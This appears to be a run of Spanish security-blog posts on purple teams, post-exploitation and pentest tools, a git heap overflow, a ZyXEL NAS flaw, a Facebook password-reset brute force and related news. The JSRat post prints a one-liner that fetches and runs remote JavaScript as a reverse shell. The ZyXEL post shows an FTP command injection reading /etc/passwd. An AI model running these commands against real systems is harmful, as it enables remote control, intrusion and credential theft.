"Purple teams": combinando ataque y defensa

Continuos escándalos de filtración de datos sensibles, denegaciones de servicio que incurren en pérdidas millonarias, ransomware que imposibilita el acceso a información capital, masivas campañas de phishing y sustracciones de dinero, etc, etc. Reconozcámoslo, todos estos ataques están haciendo que (por fin) las empresas vayan tomando en serio la necesidad de invertir en seguridad informática, cada vez más conscientes de la imparable expansión de las tecnologías y la importancia de la presencia en Internet.

Toda esta demanda ha impulsado un mercado en el que se han puesto de moda la contratación de los llamados, por un lado, "blue teams" para bloquear, detectar y prevenir ataques informáticos y, por otro lado, los "red teams" a cargo de escanear, detectar y explotar las vulnerabilidades. Es decir, un equipo para defensa y otro para ataque.

Pero desde hace tiempo también se habla de un tercer equipo, el denominado "purple team", que quizás no es tan conocido pero tiene un valor adicional muy importante. Por decirlo de una forma muy resumida, se trata de un "red team" que tiene como objetivo formar y entrenar un "blue team".

Pensarlo por un momento, la naturaleza de un "red team" en un pentest es realizar un ataque de la misma manera que lo haría cualquier atacante, sobretodo en caja negra. Es decir, analizar la red y penetrar en los sistemas usando sólo las herramientas necesarias y, si es posible, de la manera más inadvertida posible pues, como comentamos, así lo hará un atacante real. Evidentemente en el otro lado habrá un "blue team" que recibirá al final los resultados en el informe correspondiente y podrá implementar las contramedidas recomendadas, pero SÓLO para prevenir las técnicas y herramientas utilizadas específicamente por el auditor de turno.

Imaginaros, ¿no sería interesante también que el equipo de pentesting probara un abanico amplio de herramientas y técnicas para evaluar en mayor profundidad las defensas? ¿Y si además trabajara conjuntamente con el "blue team" para hacer un seguimiento coordinado de los logs y las capacidades de detección? Eso es lo que sería un "purple team", sin duda una opción más completa y constructiva para conseguir una mejor fortificación.

En definitiva, si no conocíais este término os recomiendo tenerlo en cuenta y echar un vistazo a los siguientes enlaces:

http://carnal0wnage.attackresearch.com/2016/03/more-on-purple-teaming.html

http://www.slideshare.net/beltface/hybrid-talk http://www.slideshare.net/HaydnJohnson/purple-view-56169114 http://www.slideshare.net/denimgroup/b-sides-san-antonio-albert-campa-denim-group http://www.slideshare.net/alienvault/security-by-collaboration-rethinking-red-teams-vs-blue-teams-cuispa-final-22015 https://files.sans.org/summit/hackfest2014/PDFs/Hacking%20to%20Get%20Caught%20-%20Raphael%20Mudge.pdf

PwnWiki.io - una colección de herramientas, tácticas y procedimientos a realizar después de haber obtenido acceso a un sistema

PwnWiki.io es una colección de herramientas, tácticas y procedimientos post-explotación, lo que llaman TTPs (tools, tactics, and procedures); un interesante repositorio para tener siempre a mano y usarlo cuando hayamos conseguido acceso al sistema de la víctima, por supuesto siempre como resultado de las pruebas de un test de intrusión debidamente autorizado... lol!

Puedes utilizarlo directamente accediendo mediante un navegador a http://pwnwiki.io o bajando una copia offline al equipo obteniendo el zip (aquí) o clonando el repositorio Github (git clone git@github.com:mubix/post-exploitation.wiki.git) y abriendo el index.html. 



Luego es tan sencillo como ir siguiendo cada uno de los desplegables que aparecen en la barra superior. Veréis como se trata de una estupenda guía para ir ejecutando paso a paso un montón de comandos post-explotación ya sea para analizar más en profundidad el sistema, intentar mantener persistente nuestro acceso, escalar privilegios e incluso pivotar para acceder a otros sistemas.

Ten en cuenta si trabajas offline que la mayoría de los navegadores no permiten acceder a ficheros locales desde un HTML cargado de forma local. En Windows se puede usar Mongoose Tiny o HFS y en OSX y Linux python -m SimpleHTTPServer parece funcionar bastante bien.

Todas las herramientas referencias puedes encontrarlas aquí: https://github.com/mubix/post-exploitation (si no vienen con el SO, por supuesto).

¿Fue la empresa israelí Cellebrite quién desbloqueó el iPhone de San Bernardino? ¿Cómo lo hicieron?

Ya sabéis todo el revuelo que se produjo cuando el FBI solicitó a Apple que le ayudara a obtener acceso a los datos del iPhone 5C de Syed Farook para ayudar en la investigación del atentado de San Bernardino. Incluso un juez federal emitió una orden para que la compañía de Cupertino fabricara un backdoor para ayudar al gobierno de los EE.UU. a acceder a los datos cifrados del terminal cuando fuera necesario. Apple se negó en defensa de la privacidad de sus usuarios cruzando varias declaraciones y vislumbrando incluso pleitos legales y todo ésto alimentó un gran debate (en el que todo el mundo opina) sobre hasta qué punto se debería sacrificar los derechos y libertades de las personas para salvaguardar la defensa nacional. 
 
Sin embargo, esta "guerra" "batalla" entre la compañía más valiosa y el Gobierno más poderoso del mundo terminó cuando este último anunció el lunes a una corte federal y sin entrar en mucho detalle que accedió a los datos almacenados en el iPhone del terrorista sin la asistencia de Apple. 


Apple por una parte se quitó un peso de encima al no tener que colaborar en romper la seguridad de sus dispositivos y, sin embargo por otra, se vislumbró la vulnerabilidad de los mismos (al menos las versiones más antiguas) ante un ataque de terceros. Pero, ¿cómo consiguieron acceder entonces a los datos del iPhone de Farook?

"Reverse Engineering for Beginners" - ebook gratuito de 900 páginas para reversers principiantes

"Uno podría preguntarse por qué es necesario que haya diferencias entre el código máquina y un lenguaje de programación. 

La respuesta radica en el hecho de que los seres humanos y las CPUs no se parecen - es mucho más fácil para los seres humanos utilizar un lenguaje de alto nivel como C/C++, Java, Python, etc., pero es más fácil para una CPU usar un nivel mucho más bajo de abstracción. 

Tal vez fuera posible inventar una CPU que pueda ejecutar código de un lenguaje de programación de alto nivel, pero sería mucho más compleja de la CPU que conocemos hoy. De un modo parecido, es muy incómodo para los seres humanos escribir en lenguaje ensamblador debido a que es de bajo nivel y difícil de escribir sin cometer un gran número de molestos errores. El programa que convierte el código de alto nivel en ensamblador se denomina compilador".

El texto de arriba es un fragmento traducido de "Reverse Engineering for Beginners", también conocido como RE4B, un libro escrito por Dennis Yurichev (yurichev.com) para todo aquel que quiera introducirse en la ingeniería inversa del software. Una obra impresionante que cubre desde los fundamentos más importantes hasta los más avanzados y que incluye multitud de ejemplos con distintos lenguajes y para distintas arquitecturas.
Además es gratuita bajo licencia Creative Commons Attribution-NonCommercial-NoDerivs 3.0.

Contenidos:
- Temas en profundidad: x86/x64, ARM/ARM64, MIPS, Java/JVM.
- Temas tratados: Oracle RDBMS, Itanium, copy-protection dongles, LD_PRELOAD, stack overflow, ELF, win32 PE file format, x86-64, critical sections, syscalls, TLS, position-independent code (PIC), profile-guided optimization, C++ STL, OpenMP, win32 SEH.

Por el momento tenéis la versión en inglés, ruso y coreano. Si alguno está interesado en contribuir y traducirlo al castellano comentar la entrada para una posible colaboración. 

Descarga versión completa en inglés:
- A4 para lectura e impresión
- A5 para ebooks

Descarga versión completa en inglés:
Existe también una versión reducida, aproximadamente 6 veces más pequeña (~150 páginas) para todos los que quieran tener una rápida introducción a la ingeniería inversa. Ésta no contiene nada sobre MIPS, ARM, OllyDBG, GCC, GDB, IDA, no tiene ejercicios, ejemplos, etc.
- A4 para lectura e impresión
- A5 para ebooks

Sitio web del libro: http://beginners.re/

Publican la versión 2.2.0 de Lynis (Linux Auditing Tool)

Después de varios meses de trabajo la semana pasada se publicó la versión 2.2.0 de Lynis (Linux Auditing Tool), el popular escáner de seguridad de código abierto para sistemas Unix y Linux. 

El mayor cambio en esta versión es la optimización de varias funciones lo que permite una mejor detección y hacer frente a las peculiaridades de cada sistema operativo. Por ejemplo si durante el escaneo se detecta un Apache en el sistema, se realizarán los tests correspondientes y sólo si está habilitada la configuración SSL/TLS realizará las pruebas específicas.

En el área de cumplimiento (HIPAA, ISO27001, PCI DSS, etc.) también se han hecho ajustes para empezar a soportar más pruebas en profundidad para ésto. Eso es ideal para las empresas que tienen la necesidad de cumplimiento en particular, o quieren probar y hacer cumplir los niveles de seguridad en sus sistemas. Eso sí, sólo las versiones Lynis Enterprise (1,5$ - 3$/mes) incluyen todas las pruebas y características.

Luego otra de las cosas buenas que tiene esta herramienta es que no es necesario instalarla, lo que la hace muy flexible y fácil de usar en cualquier sitio (incluso funciona en Raspberry Pi y otros dispositivos de almacenamiento). Sólo tendremos que descargarla, desempaquetarla y a correr:

wget https://cisofy.com/files/lynis-2.2.0.tar.gz
tar -zxvf lynis-2.2.0.tar.gz
cd /lynis
./lynis audit system





Por último, me ha gustado también el plugin para analizar dockerfiles, que si bien está un poco verde augura una propuesta interesante para analizar la seguridad de los contenedores:

wget https://raw.githubusercontent.com/docker-library/tomcat/ed98c30c1cd42c53831f64dffa78a0abf7db8e9a/8-jre8/Dockerfile | lynis audit dockerfile Dockerfile



Fuentes:
- Lynis 2.2.0 Released – Security Auditing and Scanning Tool for Linux Systems
- Lynis 2.2.0: New features, tests, and enhancements
- Lynis 2.2.0 – Security Auditing Tool for Unix/Linux Systems

JSRat: un sencillo backdoor en Javascript (scripts en Powershell y ahora en Python)

Hace un tiempo, el investigador Casey Smith aka @subTee nos hablaba de un técnica para llamar a un shell HTTP inverso mediante Javascript que se puede ejecutar en una sola línea mediante rundll32.exe:
rund1132.exe jav4script:"\..\mshtml,RunHTMLAppl1cation";document.write();h=new%20Act1v3XObject("WinHttp.W1nHttpRequest.5.1");h.0pen("GET","http://192.168.174.131/connect",false);h.S3nd();B=h.ResponseText;eval(B)

Luego el chino virustracker/3gstudent de Drops cogió su script en Powershell y corrigió algunos bugs e implementó varias mejoras adicionales para la evasión de antivirus y dos métodos más de carga: https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1



Y
hace unos días y recogiendo el testigo, Hood3dRob1n portó el código powershell a Python para poder usarlo en cualquier SO: https://github.com/Hood3dRob1n/JSRat-Py

Sin duda un rat sencillo pero *muy* útil con el que podremos subir y bajar ficheros y ejecutar comandos. Sirva el siguiente vídeo para la demo:

Referencias y proyecto original:
- http://en.wooyun.io/2016/02/04/42.html

- http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html
- https://gist.github.com/subTee/f1603fa5c15d5f8825c0


Appie v3: un entorno portable para pentesting de Android

¿Tienes que hacer pentesting de Android y tu portátil del trabajo tiene menos memoria que un zx81 y encima es Güindous? Appie es un paquete de software que ha sido preconfigurado para funcionar en cualquier Windows como un entorno de pentesting de Android de tal forma que ya no necesitaremos usar una máquina virtual o tener un arranque dual. Es decir, tendremos todas las herramientas necesarias funcionando sin necesidad de hacer cambios en nuestro sistema y necesitaremos unos 1,5 gigas en lugar de los 10 aprox. de una VM, además de menos memoria RAM.

Es totalmente portátil y se puede llevar en una memoria USB o smartphone y, en definitiva, se trata de una respuesta única para todas las herramientas necesarias para la evaluación de seguridad de las aplicaciones y análisis forense y de malware en Android. 



Estas son las herramientas que se incluyen en la última versión 3:
Más info en: https://manifestsecurity.com/appie/

pd. el logo que han puesto me recuerda muy mucho al de Arch Linux... XD

Ejecución remota de código en git 2.7.0 y anteriores

Recientemente se ha descubierto un desbordamiento de pila que afecta a todas las versiones de Git anteriores a la 2.7.1 y que podría permitir la ejecución remota de código, tanto en cliente como en servidor, si se sube o se clona un repositorio con un nombre de fichero muy largo o un número elevado de árboles anidados.

El problema original se detectó y publicó inicialmente en Pastebin (http://pastebin.com/UX2P2jjg):

char *path_name(const struct name_path *path, const char *name) // by design, name_path->len is a 32 bits int, but this doesn’t concern name
{
      const struct name_path *p;
      char *n, *m;
      int nlen = strlen(name); // the size is converted to a positive number (the correct size was allocated previously with an unsigned long). I got 705804100
      int len = nlen + 1;
 
      for (p = path; p; p = p->up) { //loop is skipped (except for the ᴄᴠᴇ-2016-2324 case which is fixed since 2.7.1 in February 2016)
          if (p->elem_len)
              len += p->elem_len + 1;
      }
      n = xmalloc(len); // if len is negative, it will also be converted to a negative 64 bits integer *(which explains it is normally trying to allocate serveral Pb of ram most of the time)* which will be read as positive after that. // but this isn’t the run case that is interesting here.
      m = n + len - (nlen + 1); // the size of m is lower than name
      strcpy(m, name); // strcpy rely on the null terminating character. The result is written in an unallocated memory from heap. This is the definition of heap overflow enabling server side remote code execution if name[] contains assembly, and have the correct size. This open the way to defeat canaries aslr, and nx combined see http://security.stackexchange.com/q/20497/36301#comment182004_20550
      for (p = path; p; p = p->up) {
          if (p->elem_len) {
              m -= p->elem_len + 1;
              memcpy(m, p->elem, p->elem_len);
              m[p->elem_len] = '/';
          }
      }
      return n;
}

Como resultado de ésto, para evitar el desbordamiento, se sustituyó strcpy por memcpy para que el valor de la asignación en memoria de "len" coincidiera con el número de bytes a escribir (https://github.com/git/git/commit/34fa79a6cde56d6d428ab0d3160cb094ebad3305):

char *path_name(const struct name_path *path, const char *name)
{
         const struct name_path *p;
         char *n, *m;
         int nlen = strlen(name);
         int len = nlen + 1;

         for (p = path; p; p = p->up) {
                 if (p->elem_len)
                         len += p->elem_len + 1;
         }
         n = xmalloc(len);
         m = n + len - (nlen + 1);
         memcpy(m, name, nlen + 1);
         
         for (p = path; p; p = p->up) {
                 if (p->elem_len) {
                         m -= p->elem_len + 1;
                         memcpy(m, p->elem, p->elem_len);
                         m[p->elem_len] = '/';
                 }
         }
         return n;
}

Sin embargo, si veis el código "len" se puede cambiar debido al primer loop sumando los valores para obtener un valor más pequeño que el asignado al buffer (ej.
A=2^31-5, B=2^31-5, C=20A=2^31-5, B=2^31-5, C=20 daría len=10), por lo que en la versión 2.7.1 se decidió eliminar path_name() y la comprobación de size_t/overflow en tree-diff.c.

El problema es que varios meses después de la supuesta corrección, la mayoría de las distribuciones Linux no lo han resuelto todavía para su rama estable.

Esto podría afectar a Github o Bitbucket o, incluso peor, a instalaciones en hosting propios como por ejemplo de Gitlab.
Por lo que si trabajas con un repositorio git tendrías que tener mucho cuidado con estas vulnerabilidades: CVE-2016-2324, CVE-2016-2315 .

Exploit is coming...

Fuente:
- [oss-security] server and client side remote code execution through a buffer overflow in all git versions before 2.7.1 (unpublished ᴄᴠᴇ-2016-2324 and ᴄᴠᴇ‑2016‑2315)
- Remote Code Execution in all git versions (client + server) < 2.7.1: CVE-2016-2324, CVE-2016-2315 


Actualización: Como nos comenta Laël Cellier incluso la versión 2.7.3 seguía vulnerable con path_name(). Parece que en la versión 2.8.0-rc0 se ha solucionado pero no obstante y como indica lo mejor es compilar de nuevo del master branch de

https://git.kernel.org/cgit/git/git.git/.

Abierta la inscripción al #MundoHackerDay 2016

Por tercer año consecutivo vuelve a Madrid el MundoHacker Day, esta vez en el Kinépolis los días 27 y 28 de abril:


Dos días de conferencia con un montón de tracks técnicos, mesas redondas y expertos de seguridad TI como Jaime Andrés Restrepo (dragonJAR), Yago Hansen,  s4ur0n, Thomas D'otreppe (autor de la suite de hacking wi-fi aircrack-ng) y muchos más... además el registro es totalmente gratis, te invitan a café, a comer un día, a la fiesta y hasta te regalan una camiseta, ¿qué más se puede pedir?

Pues eso: http://www.mundohackerday.com/index.html#tickets

Zyxel no soluciona una vulnerabilidad grave en una de sus NAS por vieja (EoL)... pero sigue vendiéndola!

Recientemente se ha reportado una vulnerabilidad grave en el Mediaserver/NAS modelo ZyXEL NSA-310 que permite a atacantes remotos ejecutar código arbitrariamente como root. 

Ya se conocía la de existencia de un backdoor en el último firmware V4.70(AFK.1), muy apropiado para un producto que lleva como nombre "NSA...", pero es que además es posible usar una comilla simple "'" para introducir comandos de sistema.
 

Veamos unos ejemplos:
Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220­ You are user number 1 of 10 allowed.
220 ­Local time is now 22:46. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';cat /etc/passwd;
root:x:0:0:root:/root:/bin/sh
Como veis podemos usar el servidor FTP para mostrar el contenido del fichero passwd.

Llega Hardsploit, el "Metasploit" para hardware que hará tus pentests más completos

Julien Moinard y Gwénolé Audic de Opale Security han creado un framework para automatizar la revisión de vulnerabilidades de los dispositivos de Internet de las Cosas.
 
Se trata del proyecto Hardsploit, una herramienta todo-en-uno para las auditorías de seguridad de hardware que será presentada próximamente en:

  • Hack In The Box (HITB) – May 26 2016 10:45 am – 11:45 am – Amsterdam
  • NullCon – 11 / 12th March 2016 – Goa
  • (FORMACIÓN) BlackHat – July 30 / 31 & August 1 / 2 – Mandala Bay / Las Vegas
Pretende convertirse en el Metasploit o Nessus para hardware, sin duda un punto de revisión más a cubrir en cualquier pentesting. Tener en cuenta que en estas auditorías de seguridad normalmente no se cubren análisis del hardware de firewalls, antivirus, IDS y otras aplicaciones que funcionan en dispositivos embebidos. Y no es raro por ejemplo encontrar contraseñas hardcodeadas en los sistemas de archivos y otros fallos de configuración en el firmware...

"La brecha entre el software y el hardware de seguridad se ha ampliado desde la década de 2000 ... porque el hardware es fundamentalmente sólo una forma de obtener acceso a software" dice Gwénolé. Por otro lado Julien comenta que "el objetivo es crear un puente entre el hardware y el software ... la mayor parte del tiempo de pruebas de intrusión saben cómo acceder a software, pero cuando se tiene el hardware, entonces es más complicado".

HardSploit se presenta como un tool box con una placa modular HSP-R1-001 (300€) más software y un GUI para Kali Linux. Esta le permitirá al pentester interceptar, reenviar o enviar datos a través de cualquier bus I2C, JTAG, SPI, PARALLEL o UART del hardware analizado.

Tenéis más información, documentación e incluso videotutoriales en la página del proyecto: https://hardsploit.io

Reportan una sencilla vulnerabilidad en Facebook (ya corregida) que podría haberse usado para comprometer cualquier cuenta

Hay veces que no es necesario ahondar en un protocolo, hacer un complicado reversing o un tedioso fuzzing para encontrar una vulnerabilidad crítica que afecta a un servicio tan usado como Facebook. Basta con saber buscar y encontrar en el momento oportuno...

Este es el caso de la vulnerabilidad reportada el 22 de febrero por Anand Prakash que fue premiado con 15000$ USD (Facebook la corrigió el 2 de marzo).

Y, ¿en qué consistía? Pues ya sabes que si olvidas una contraseña en Facebook existe la opción de resetearla introduciendo un número de teléfono o dirección de correo electrónico en https://www.facebook.com/login/identify?ctx=recover&lwv=110. Luego Facebook envía un código de 6 dígitos para poder introducir una nueva contraseña. Si realizas un ataque de fuerza bruta sobre www.facebook.com serás bloqueado después de 10-12 intentos, pero parece que Facebook olvidó poner este umbral en beta.facebook.com y mbasic.beta.facebook.com:

POST /recover/as/code/ HTTP/1.1
Host: beta.facebook.com

lsd=AVoywo13&n=XXXXX



Efectivamente, cualquiera que sacara por fuerza bruta el código "n" podía resetear la contraseña de cualquier usuario de Facebook... impresionante.

Fuente: [Responsible disclosure] How I could have hacked all Facebook accounts

Cómo quitar la contraseña de la consola de McAfee VirusScan

McAfee es sin duda unos de los antivirus de puesto de usuario más usados en las empresas. Seguro que si habéis administrado alguna ePO o simplemente tenéis el VirusScan instalado os habréis dado cuenta que si intentáis desactivar la Protección de acceso o el Analizador en Tiempo Real normalmente no se puede directamente porque el interfaz de usuario está protegido por contraseña:
 


Digamos que es una manera que tiene McAfee VirusScan Enterprise de proteger su motor de escaneo de los *malvados* administradores locales de Windows, una contraseña que nos pedirá la Consola de VirusScan al menos que hayamos arrancado Windows en "Modo Seguro".

Si la contraseña es correcta la Consola solicita al Motor de antivirus que desbloquee las claves de registro. Y ese es el problema, que el motor no lo comprueba por si mismo y cualquiera puede "pedirle" al motor que pare sin saber la contraseña correcta.

[Breve] crónica de la #Rooted2016

Ya sabéis que el finde pasado fue la séptima edición de la Rooted CON y quería comentar con vosotras algunas de mis impresiones, críticas y demás pensamientos. Estoy demasiado vago para letrar sobre todas las ponencias que hubo cada día una a una, así que permitirme centrarme sólo en algunas cosas que me llamaron especialmente la atención, por supuesto sin dejar de animaros a que veáis cada charla cuando suban los vídeos ya que hubo muchas realmente buenas e interesantes.

El primer gran cambio de este año fue la ubicación, esta vez en una de las salas del Kinépolis. Un buen sitio para los que somos del sur y sobretodo con aparcamiento por doquier algo que se agradece. También como es un cine podéis imaginaros... butacas cómodas (faltaban las palomitas) y las dimensiones espectaculares de la pantalla de cine (los que fueron luego al Faqin congress lo notaron). Eso sí, en la sala falló bastante el sonido (Hack RF trolls?) y hubo algo de retardo (que no retraso) con la imagen proyectada de los ponentes.

Luego qué deciros..., me queda en la retina el dominio del élfico aka ensamblador de SkUaTeR (muy del gusto de reversers), sin olvidar el mimo a radare, el "jack knocking" del pibe Matías bandera de 8.8, las idas y venidas de los tertulianos en los paneles, la confirmación de que el entramado de IKS hace inviable el tracking a piratería de la tv por satélite, el "Enriquito Iglesias" que hizo Román al intentar parar un dron de 500 leuros con la mano (os dejo el vídeo), etc. etc. Son tantas cosas y tan variadas que lo que seguro que lo que me hizo tilín a mi a ti no lo hizo y viceversa...

Cyborg Hawk Linux, una distribución interesante para pentesting

Cyborg Hawk Linux es una distribución totalmente gratuita para tests de intrusión basada en Ubuntu (Linux) y desarrollada y diseñada por y para hackers éticos y pentesters. Esta distro se puede utilizar para la seguridad y evaluación de red y para el análisis forense digital. También cuenta con varias herramientas enfocadas a las pruebas de seguridad móvil y la infraestructura inalámbrica y tiene su propio repositorio PPA personalizado.


Como véis en la imagen de arriba tiene un menú bastante bien organizado, con un total de 750 herramientas bien organizadas y ordenadas separadas en distintas categorías:

- Recopilación de información
- Evaluación de vulnerabilidades
- Explotación
- Escalado de privilegios
- Persistencia de accesos
- Documentación y elaboración de informes
- Ingeniería inversa
- Pruebas de stress
- Forenses
- Seguridad inalámbrica
- RFID / NFC
- Hardware de hacking
- Análisis de VoIP
- Seguridad móvil

Tiene una versión liveCD totalmente funcional y desde la versión 1.1 soporte completo para máquinas virtuales. Evidentemente no es una distro tan madura como Kali u otras pero puede ser una apuesta interesante si mantienen su desarrollo y evolución. Habrá que tenerla también en cuenta.

Puedes descargarla de: cyborg-hawk-linux-v-1.1.iso

O leer más aquí: http://cyborg.ztrela.com/

WTF! "Hackea el Pentágono", nuevo programa de recompensas de vulnerabilidades

Recientemente el Departamento de Defensa de los EE.UU. ha anunciado lo que llaman "el primer programa de recompensas de vulnerabilidades de la historia del gobierno federal", invitando a los hackers de todo el mundo a que pongan a prueba la seguridad de sus páginas web y redes.

El concurso es sólo para hackers "examinados", lo que significa que cualquier persona con la esperanza de encontrar vulnerabilidades en sus sistemas primero tendrá que pasar una comprobacion de sus antecedentes. Luego, según comenta la Agencia (y por supuesto), los participantes podrán ganar dinero y reconocimiento por su trabajo.

El programa piloto está programado para comenzar en abril. Eso sí, los participantes empezarán a trabajar en un sistema predeterminado que no es parte de sus operaciones críticas.

De acuerdo con una lista publicada el Departamento de Defensa gestiona actualmente 488 sitios web que se dedican a todo, desde el 111th Attack Wing y otras unidades militares hasta el programa de reintegración Yellow Ribbon.

La iniciativa "Hackea el Pentágono" es el trabajo del Servicio de Defensa digital, una unidad del Departamento de Defensa, que fue lanzada el pasado otoño como parte del Servicio Digital de la Casa Blanca.

Según el director del DDS Chris Lynch, "Traer  el mejor talento, la tecnología y los procesos del sector privado no sólo nos ayuda a ofrecer soluciones integrales y más seguridad para el Departamento de Defensa, sino que también nos ayuda a proteger mejor a nuestro país."

El verano pasado, la Oficina de Administración de Personal reveló que la información privada de más de 20 millones de trabajadores y otras personas del gobierno de Estados Unidos había sido robados en un fallo de seguridad masiva.

Hace casi tres años, el Pentágono dijo públicamente el gobierno de China ha llevado a cabo ataques cibernéticos contra el gobierno de EE.UU., citando los ataques a "numerosas redes de EE.UU. diplomáticos, económicos y de la industria de defensa".

Así que crear un programas bug bounty como otras empresas privadas, parece una buena idea...

Fuentes:
- U.S. military invites vetted experts to 'Hack the Pentagon' 
- U.S. Announces 'Hack The Pentagon' Bug Bounty Program
- The Pentagon Wants You to Hack It
- The US military wants you to 'Hack the Pentagon'

System Bus Radio, un programa que transmite radio en ordenadores sin hardware para transmitir radio

Algunos equipos están desconectados intencionadamente del resto del mundo. Esto incluye tener desconectado cualquier acceso a Internet, Wi-Fi, Bluetooth, USB, dispositivos de almacenamiento externos e incluso audio. Esto se conoce como "air gapping". Incluso en tal situación, el programa que vemos en esta entrada puede transmitir radio.

¿No te lo crees? Descarga de Github el programa, compila (gcc main.c -Wall -O2 -o main) y ejecútalo en un Apple MacBook Air (de 13", anterior a 2015).

Luego usa el receptor de radio de un home cinema Sony STR-K670P (podrían funcionar otros) y sintoniza el dial 1580 kHz de AM... escucharás el ritmo de la canción "Mary Had a Little Lamb" de forma contínua.

Esto es posible porque las instrucciones del programa hacen emitir radiaciones electromagnéticas en una amplia gama de frecuencias desde el ordenador. Eso sí, para poder escuchar las emisiones en la radio, las frecuencias deben:

- ser emitidas por el procesador del PC y otros subsistemas
- deben poder "escapar o salir" de la caja del ordenador
- transmitirse a través del aire o de otras obstáculos
- ser aceptado por la antena
- ser seleccionado por el receptor

Mediante prueba y error, se encontraron estas frecuencias ideales para ese equipamiento. Las emisiones son causadas por las instrucción  _mm_stream_si128 al escribir en memoria, algo que se vió recientemente en el 24th USENIX Security Symposium (USENIX Security 15). Luego el programa utiliza la modulación de onda cuadrada.

Tenéis el código del programa y más información en: https://github.com/fulldecent/system-bus-radio